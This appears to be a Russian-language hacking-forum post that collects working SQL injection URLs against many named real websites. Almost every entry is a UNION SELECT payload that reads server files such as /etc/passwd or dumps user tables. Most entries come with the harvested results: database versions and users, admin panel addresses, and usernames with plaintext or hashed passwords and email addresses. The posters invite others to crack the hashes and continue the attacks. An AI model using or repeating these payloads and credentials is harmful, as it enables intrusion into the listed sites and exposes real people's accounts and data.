SQL Инъекции

http://talentvelocity.us/index.php?page_id=-1&news_id=-1+union+select+1,2,load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),4,5,6/*


http://www.sportsplex.us/news.php?newsID=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4/*

 

http://weather.properm.ru/-1+union+select+1,grantee,privilege_type,4+from+information_schema.user_privileges+limit+0,1.html

 

http://www.oldarms.ru/litera.php?id=11&idg=-773+union+select+1,login,passwd,4,5,6,7,version(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+users/*
ss:ss

 

http://fmlive.us/news/index.php?newsid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,txt_username,txt_password,txt_email_address),11+from+totalwar.tbl_login+limit+1,1--


http://www.eibach.us/index_2.php?SPA=1&C_lang=en&LID1=13&LID2=0&LID3=0&LID4=0&LST=&NEWSID=-1+union+select+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')/*



http://www.rahulgandhi.us/php/showNews.php?newsid=1&linkid=-1+union+select+version()--



http://www.globalfriendship.us/newsdetail.php?news_id=-1+union+select+1,version(),3,4--

 

Dbname: magind_main
Version: 5.0.51a-community
User: magind@localhost

 

http://www.biosecure.us/index.php?content=news&news_id=-1'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10/*
----------------------------------------------------



http://larry.matthouse.us/index.php?pageid=-1+union+select+1,version(),3--
----------------------------------------------------


http://citycarclub.us/page.php?id_page=-1+union+select+1,2,load_file(0x2f7661722f7777772f68746d6c2f6363635f66692f656e2f61646d696e2f696e636c7564652f436f6e6669672f436f6e6669672e706870)/*

version:4.0.20-log
user:wwwadmin@localhost
database:ccc_en
-----------------------------------------------------


http://www.multiplesclerosisfoundation.net/online_newsDetails.php?ID=-1+union+select+1,2,load_file('/etc/passwd'),4,5,6/*

version:4.0.24-standard
user:root@localhost
database:msf_db
----------------------------------------------------


http://bowenshideout.limelyte.net/news.php?news_id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,user_id,user_pass,user_email,user_url,user_level))),6,7,8,9,10+from+nichebox.nb_users+limit+0,1/*

version:5.0.15
user:ann@localhost
database:nichebox

nichebox.nb_users
user_id
user_timestamp
user_sessions
user_lastsession
user_pass
user_email
user_fullname
user_showemail
user_url
user_level
user_latitude
user_longitude
user_bio

Админка
http://bowenshideout.limelyte.net/admin/
---------------------------------------------------------------


http://miheeff.net/news.php?news_id=-1+union+select+1,2,concat_ws(0x3a,username,rpassword),4,5,6,7,8,9,10,11+from+affil.wd_g_users+limit+0,1--

version:5.0.51b-community-nt
user:admin@localhost
database:miheeff_net

Блог admin:admin
Админка:
http://miheeff.net/admin/

 

слепая
http://www.simbin.se/news.php?newsid=108+union+select+1,2,3,4,5+from+users--

http://www.shootingstarsfootballclub.com/gallery.php?catID=1+and+0+union+select+1,2,version(),4,5--

 

http://www.jackrussellmusic.net/news.php?news_id=-1+union+select+1,concat_ws(0xb,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/*

version:5.0.45-log
user:[email protected]
database:db210992846

Админка
http://www.jackrussellmusic.net/phpmyadmin/
----------------------------------------------------------------------


http://www.crivello.net/news_detail.php?news_id=-1+union+select+1,concat_ws(0xb,username,password),3,4,5,6,7,8,9,10+from+marinegr_mgv.tbladmin--

version:5.0.51a-3ubuntu5.1
user:crivbus@localhost
database:crivbus_crivello

Admin ishir:ishir123
-------------------------------------------------------------

http://thebigone.homeip.net/comments/comment_news.php?news_id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6/*
-----------------------------------------------------------------



http://www.inspiredadventures.com.au/news.php?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9--

version:5.0.51b-log
user:ins@localhost
database:insInspired

Есть таблицы от phpmyadmin
-----------------------------------------------------------------



http://www.nrn.org.au/local_update.php?news_id=9999+union+select+1,unhex(hex(concat_ws(0xb,admin_email,admin_password))),3,4,5,6+from+tbl_admin_user+limit+0,1--

Админ
[email protected]:593f2e62bf3cb5b255dc15b842c84ff0!e5
[email protected]:7dbf82d961104983d41a20cf3c146250!94
я только не вьехал чё за хэш....толи солёный мд5, толи ещё что...

Админка: http://www.nrn.org.au/admin/
----------------------------------------------------------------


http://www.lakewoodshores.com.au/index.php?option=previous&news_id=-1+union+select+1,2,3,Concat_ws(0xb,version(),user(),database()),5/*

version:5.0.27-log
user:lakewood@localhost
database:lakewood_db

Админка: http://www.lakewoodshores.com.au/admin/
-----------------------------------------------------------------------



http://www.animaldoctors.com.au/index.php?pgid=7&news_id=-1+union+select+1,2,concat_ws(0xb,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

version:5.0.51a-community
user:animaldo_bbuser@localhost
database:animaldo_bbdb

Юзвери(может и админы)
[email protected]:.exa11.:
bbadmin:bbadmin01:[email protected]
admin101:animal:[email protected]

 

универмаг
http://www.tsum.kirov.ru/img/?id=-1+union+select+1,2,img+from+images+where+id=343

user:
tsum@localhost

admin:
https://www.tsum.kirov.ru:10000/ //webmin

information_schema:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
author
content
games
images
konkurs_konkurs
konkurs_otvet
konkurs_peoples
konkurs_vopros
link_org
link_words
links
miss
news
orders
orgs
price
properties
stat
temp
vote_quest
vote_theme
za_ro_points
za_ro_points1
za_ro_points2
za_ro_points3
za_ro_points_all
za_ro_points_all_2006
za_ro_points_old
za_ro_points_t
za_rodinu
counsel
forums
messages
sendmail
sessions
themes
users

 

Вот админка: http://www.tsum.kirov.ru/admin

http://www.tsum.kirov.ru/img/?big=2&id=-1+union+select+1,concat(login,0x3a,password),3+from+tsum_forum.users+limit+0,1+--+

Юзеры форума:

a:a
Администрация:123
Редактор:Редактор

и т.д. по лимиту

 

На сайте http://www.akords.net/ когда заходишь в текст или аккорды выдает пхп синтакс эрор. Не знаю как раскрутить скулю.. Попробуйте кто умеет

 

Для любителей пошпилить:

еще интересности:
admin.eurogamer.net
sales.eurogamer.net

некоторые пассы расшифровались,кто найдет пхпмайадмин, стучите)

 

http://www.damagame.com/player.php?_id=-1+union+select+1,concat_ws(0x3a,_id,login,pass,email),3,4,5,6,7,8,9,10,11,12+from+damagame_damagame.players+where+login=0x61646d696e--
admin:sassouki

 

http://bbc-polska.com/index.php?t=of&_id=-1+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8+from+bbc.user/*

Админка : http://bbc-polska.com/admin admin:bbc

 

5 ветка

http://arsenal-electro.ru/news_page.php?id=-1+union+select+1,2,concat(email,char(58),password),4+from+user+limit+1,1/*

 

Code:

http://www.akords.net/ru/song/-32702+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--/

Дальше сам, там пятая ветка

 

Code:

http://www.eajc.org/analytics_show_r.php?id=-27+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,name,pass),7,8,9+from+adbm_user--

логин,пасс:

Code:

admin:1d1ac3f687c1572b5654e3fbd502a7c9

---------------------------------------

Code:

http://www.operationsports.com/pressview.php?id=-52+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13+from+user

логин,пасс:

Code:

Administrator:ad31bcf7706b6b6ec87ab0229346cd

--------------------------------------

Code:

http://scarsdalecoops.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/*%20*/admin/*where,limit,2--

логин,пасс:

Code:

re310t4554rtr54try41h1g892g2h65j:57re7palm1513g4hg

-------------------------------

Code:

http://www.berceaumagique.com/cat.php?id=-6+union+select+1,2,3,concat_ws(0x3a,login,0x3a,pass,0x3a,mail),5,6,7,8,9+from+admin+where+id=1--

логин,пасс:

Code:

charlotte:407686174a65f5219d4b2132df7d29fa

--------------------------------

Code:

http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,concat(username,0x3a,user_password,0x3a,user_email),6,7+from+phpbb_users+limit+1,1/*

логин/пасс:

Code:

admin:81407d59d0a24fc624b87f54c23b74b5

 

http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,version(),3/*

version 5.0.37-community-log
user [email protected]
database globalwaterfoundation_org_-_1

 

Магазин Исполнителя Гитариста Продюссера
Tim Scott

http://www.timscott.co.uk/store/product_detail.php?id=3+union+select+1,2,3,version(),5,user(),database(),8 ,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24--

version 4.1.22-standard
user [email protected]
database timscott

 

Магазин каких-то безделушек -)

http://www.forgetyourself.com/product.php?id=-4/**/union/**/select/**/1,database(),3,4,user(),6, 7,8,9 ,10,11,12,13,14,version(),16,17,18--

version 5.0.51a-community
database indig_fys
user indig_fys@localhost